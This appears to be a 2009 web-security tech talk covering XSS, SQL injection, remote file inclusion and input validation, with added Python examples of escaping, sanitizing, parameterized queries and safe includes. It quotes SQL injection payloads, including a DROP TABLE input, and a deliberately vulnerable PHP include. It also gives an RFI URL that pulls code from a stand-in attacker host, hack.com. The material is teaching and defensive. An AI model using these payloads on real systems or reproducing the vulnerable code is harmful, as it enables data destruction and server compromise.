Web Security: Tech Talk. Mallik, http://codeinspections.blogspot.com, March 20th, 2009
Introduction
Web applications are openly accessible on the web, which makes them more exposed to attack.
Web developers are often not well versed in security issues, which is why their applications end up with vulnerabilities.
Web applications run in the browser, so any security loophole in the browser can be used to exploit a vulnerability in the web application.
Where do security bugs hide? [Diagram: Functional Bugs, Security Bugs; Design, Implementation]
Web Vulnerabilities
XSS (Cross Site Scripting) attack: 44%
SQL Injection: 25%
Input Validation: 8%
Remote File Inclusion: 17%
Cookie Theft: 3%
XSS (Cross Site Scripting)
XSS: code injection by malicious web users into web pages.
Non-persistent: these holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. Ex: search engines (exploited using social engineering). [Example]
Persistent: an XSS vulnerability that exists when data provided to a web application by a user is stored persistently on the server. Ex: Blogger comments. [Example]
XSS (Cross Site Scripting) Exploits
Session hijacking / cookie theft [Example]
Redirecting the page to the hacker's desired location (persistent) [Example]
Preventing XSS
Escaping/filtering some characters like < and >, as we do for the Portal application.
Replacing characters: < with &lt; and > with &gt;.
Both of the above solutions prevent users from entering rich HTML content, which is required for many Web 2.0 products.
Escape only the HTML tags which can be malicious, like <script>, <meta>, etc. Blogger and MySpace are some sites with this kind of implementation.
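The two strategies on this slide side by side, as an added example that is not part of the original talk: escape_all() encodes every markup character (no rich text survives), while sanitize_html() keeps an allowlist of harmless tags so rich content survives and <script>, <meta> and every other tag are shown as text. The tag and attribute policy here is hypothetical; an allowlist of known-safe tags is used rather than a denylist of known-bad ones, because the denylist has to be updated every time a new dangerous tag or attribute appears.

```python
# Added example, not from the slides: strict escaping versus an allowlist
# sanitizer for user-supplied HTML. Tag/attribute policy is hypothetical.
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}  # hypothetical policy
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_SCHEMES = ("http://", "https://")


def escape_all(text: str) -> str:
    """Strict approach from the slide: < becomes &lt;, > becomes &gt;, and so on."""
    return html.escape(text, quote=True)


class _Sanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            # Not on the allowlist: the tag is displayed as text, never rendered.
            self.out.append(html.escape(self.get_starttag_text(), quote=True))
            return
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # drops event-handler attributes such as onclick
            if name == "href" and not value.lower().startswith(SAFE_URL_SCHEMES):
                continue  # drops javascript: and data: links
            parts.append(f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> style tag: nothing to close

    def handle_endtag(self, tag):
        closing = f"</{tag}>"
        self.out.append(closing if tag in ALLOWED_TAGS else html.escape(closing))

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))


def sanitize_html(fragment: str) -> str:
    """Rich-text approach: allowed tags pass through, all other markup is neutralised."""
    parser = _Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```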
SQL Injection
SQL Injection is a security vulnerability occurring in the DB layer. It is a method of injecting SQL commands/queries through the web page. A hacker can come up with crafted input which causes the application to do what it is not supposed to do.
Example: incorrect escaping/filtering.
Query: statement = "SELECT * FROM users WHERE name = '" + userName + "';"
Hacker's input: a' OR 'x'='x
Final statement: SELECT * FROM users WHERE name = 'a' OR 'x'='x';
SQL Injection
More serious attack:
Query: statement = "SELECT * FROM users WHERE name = '" + userName + "';"
Hacker's input: a'; DROP TABLE Users; SELECT * FROM Users WHERE name LIKE '%
Final statement: SELECT * FROM users WHERE name = 'a'; DROP TABLE Users; SELECT * FROM Users WHERE name LIKE '%';
Preventing SQL Injection
Escaping special characters: an error-prone way to prevent injection is to escape dangerous characters.
- Replace ' with ''
- In MySQL, use mysql_real_escape_string() to escape special characters
Using parameterized statements:
using (SqlCommand myCommand = new SqlCommand("SELECT * FROM USERS WHERE USERNAME=@username AND PASSWORD=@password", myConnection)) {
    myCommand.Parameters.AddWithValue("@username", user);
    myCommand.Parameters.AddWithValue("@password", pass);
}
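The concatenated query from the two SQL Injection slides beside the escaping and parameterized fixes from this slide, as an added example that is not part of the original talk. It runs against an in-memory SQLite database with constructed sample rows; the stacked DROP TABLE payload is sent through executescript() because a single sqlite3 execute() refuses more than one statement.

```python
# Added example, not from the slides: three ways of building the users query,
# run against constructed data so the difference is visible in row counts.
import sqlite3

SAMPLE_USERS = ["alice", "bob", "carol"]  # constructed sample data


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)", [(u,) for u in SAMPLE_USERS])
    return conn


def find_by_name_concat(conn, user_name):
    """Vulnerable: the input is pasted into the SQL text, as on the slide."""
    statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return conn.execute(statement).fetchall()


def find_by_name_escaped(conn, user_name):
    """Escaping: ' becomes '' so the input cannot terminate the string literal.
    Defeats this payload, but is easy to get wrong across encodings and drivers."""
    escaped = user_name.replace("'", "''")
    return conn.execute("SELECT * FROM users WHERE name = '" + escaped + "';").fetchall()


def find_by_name_param(conn, user_name):
    """Parameterized: the value is bound by the driver and never parsed as SQL."""
    return conn.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall()


def row_counts(user_name) -> dict:
    """How many rows each variant returns for the same input."""
    conn = make_db()
    return {
        "concat": len(find_by_name_concat(conn, user_name)),
        "escaped": len(find_by_name_escaped(conn, user_name)),
        "param": len(find_by_name_param(conn, user_name)),
    }


def users_table_survives(user_name) -> bool:
    """Runs the concatenated query through a multi-statement driver call and
    reports whether the users table still exists afterwards."""
    conn = make_db()
    try:
        conn.executescript("SELECT * FROM users WHERE name = '" + user_name + "';")
    except sqlite3.Error:
        pass  # an error in a later statement does not undo an already-run DROP
    row = conn.execute("SELECT 1 FROM sqlite_master WHERE name = 'users'").fetchone()
    return row is not None
```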
Remote File Inclusion
RFI vulnerabilities allow hackers to run their code on the web server. XSS is code injection on the client side, whereas RFI is on the server side.
Bad coding practice: filenames sent as query parameters were used like any normal variable in the code. This was one of the common PHP vulnerabilities in the early days.
RFI Example
<?php $file = $_REQUEST['file']; include($file . ".php"); ?>
URL: http://test.com/test.php?file=http://hack.com/hack.php?
The code in hack.php would get executed on the server.
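A safer counterpart to the include($file.".php") pattern above, written in Python as an added example that is not part of the original talk. The page name from the request is validated as a plain identifier, checked against an allowlist of known pages and resolved inside one base directory, so URLs, "..", and absolute paths are refused before anything is loaded; the page names and directory are hypothetical.

```python
# Added example, not from the slides: resolving an include target from a
# request parameter without letting the parameter name a URL or an arbitrary
# path. Page names and the temporary directory are constructed for the demo.
import os
import re
import tempfile
from typing import Optional

PAGE_NAME = re.compile(r"[a-z0-9_]{1,32}")  # only simple identifiers are accepted


def resolve_page(base_dir: str, allowed_pages: set, file_param: str) -> Optional[str]:
    """Absolute path of the page to include, or None if the request is refused."""
    if PAGE_NAME.fullmatch(file_param) is None:  # rejects "http://...", "../x", "a.php"
        return None
    if file_param not in allowed_pages:            # unknown page names are refused
        return None
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, file_param + ".php"))
    if os.path.commonpath([base, path]) != base:   # must still resolve inside base_dir
        return None
    return path if os.path.isfile(path) else None


def probe_requests(requests: list) -> dict:
    """Builds a temporary page directory with two constructed pages and reports
    which request values would be accepted for inclusion."""
    with tempfile.TemporaryDirectory() as base:
        for name in ("home", "about"):
            with open(os.path.join(base, name + ".php"), "w") as fh:
                fh.write("<?php echo 'constructed page'; ?>\n")
        allowed = {"home", "about"}
        return {r: resolve_page(base, allowed, r) is not None for r in requests}
```

Independently of the application code, PHP's allow_url_include=Off setting blocks include() of URLs outright, which is the right default to keep.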
Input Validation
Most security vulnerabilities are caused by malicious input.
Input validation on the client side (JavaScript) alone will not suffice. We need to check user input on both client and server. A hacker can disable the checks on the client side and send invalid input to the server side. [Example]
Example: a shopping-site example of how serious an attack can be if there is no server-side check.
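Server-side re-validation of a shopping order, as an added example that is not part of the original talk. The slide does not spell out its shopping-site example, so this assumes the usual form of it: the browser sends product id, quantity and price, client-side JavaScript has already checked them, and the server must re-check every field and take the price from its own catalogue rather than from the form; the products and limits are constructed.

```python
# Added example, not from the slides: the server repeats every check the
# client-side JavaScript made, because the client can skip them.
import re
from decimal import Decimal

CATALOG = {"book-101": Decimal("12.50"), "pen-7": Decimal("1.20")}  # constructed
MAX_QTY = 10
QUANTITY = re.compile(r"[0-9]{1,3}")  # digits only: no sign, no decimals, no blanks


class InvalidOrder(ValueError):
    """Raised when a submitted order fails a server-side check."""


def validate_order(form: dict) -> dict:
    """Returns the order the server will actually charge, or raises InvalidOrder."""
    product = form.get("product")
    if product not in CATALOG:
        raise InvalidOrder("unknown product")
    qty_raw = form.get("quantity")
    if not isinstance(qty_raw, str) or QUANTITY.fullmatch(qty_raw) is None:
        raise InvalidOrder("quantity must be a whole number")
    qty = int(qty_raw)
    if not 1 <= qty <= MAX_QTY:
        raise InvalidOrder("quantity out of range")
    unit_price = CATALOG[product]  # any client-submitted price is ignored
    return {"product": product, "quantity": qty, "total": unit_price * qty}


def is_accepted(form: dict) -> bool:
    """True if the submitted form passes all server-side checks."""
    try:
        validate_order(form)
        return True
    except InvalidOrder:
        return False
```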
Security Vulnerability via Browser Bugs
Browser bugs can sometimes lead to vulnerabilities in web applications. An example is the cross-domain XMLHTTP vulnerability in the first version of Chrome.
What is cross-domain XMLHTTP? What was the bug in Chrome version 1.0? [Example]
Lessons to Learn
Web security is not rocket science.
Validate input.
Validate output.
Watch for new security attacks and how they affect your products.
Thank You